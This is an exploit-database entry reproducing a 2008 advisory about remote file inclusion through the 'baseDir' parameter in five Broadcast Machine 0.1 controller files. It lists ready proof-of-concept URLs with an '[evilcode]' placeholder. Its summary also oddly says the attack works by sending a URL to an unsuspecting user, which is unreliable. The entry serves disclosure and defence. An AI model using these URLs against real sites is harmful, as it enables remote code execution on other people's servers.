header-logo
Suggest Exploit
vendor:
Broadcast Machine
by:
NoGe
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Broadcast Machine
Affected Version From: 0.1
Affected Version To: 0.1
Patch Exists: YES
Related CWE: N/A
CPE: a:broadcast_machine:broadcast_machine:0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Broadcast Machine 0.1 Multiple Remote File Inclusion Vulnerability

Broadcast Machine version 0.1 is vulnerable to a remote file inclusion vulnerability due to insufficient sanitization of user-supplied input to the 'baseDir' parameter in multiple files. An attacker can exploit this vulnerability by sending a malicious URL to an unsuspecting user. The malicious URL contains a reference to a file located on a remote server that will be included in the application. This can allow an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

=================================================================================================================


  [o] Broadcast Machine 0.1 Multiple Remote File Inclusion Vulnerability

       Software    : Broadcast Machine version 0.1
       Vendor      : http://code.google.com/p/broadcastmachine/
       View Source : https://svn.participatoryculture.org/svn/dtv/trunk/bmachine2/
       Author      : NoGe
       Contact     : noge[dot]code[at]gmail[dot]com
       Blog        : http://evilc0de.blogspot.com


=================================================================================================================


  [o] Vulnerable file

       all file below is affected by "baseDir" parameter

        controllers/MySQLController.php

        controllers/SQLController.php

        controllers/SetupController.php

        controllers/VideoController.php

        controllers/ViewController.php



  [o] Exploit


       http://localhost/[path]/controllers/MySQLController.php?baseDir=[evilcode]

       http://localhost/[path]/controllers/SQLController.php?baseDir=[evilcode]

       http://localhost/[path]/controllers/SetupController.php?baseDir=[evilcode]

       http://localhost/[path]/controllers/VideoController.php?baseDir=[evilcode]

       http://localhost/[path]/controllers/ViewController.php?baseDir=[evilcode]


=================================================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org/blog/]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
       H312Y yooogy mousekill }^-^{ kaka11 martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]

        
=================================================================================================================

# milw0rm.com [2008-11-30]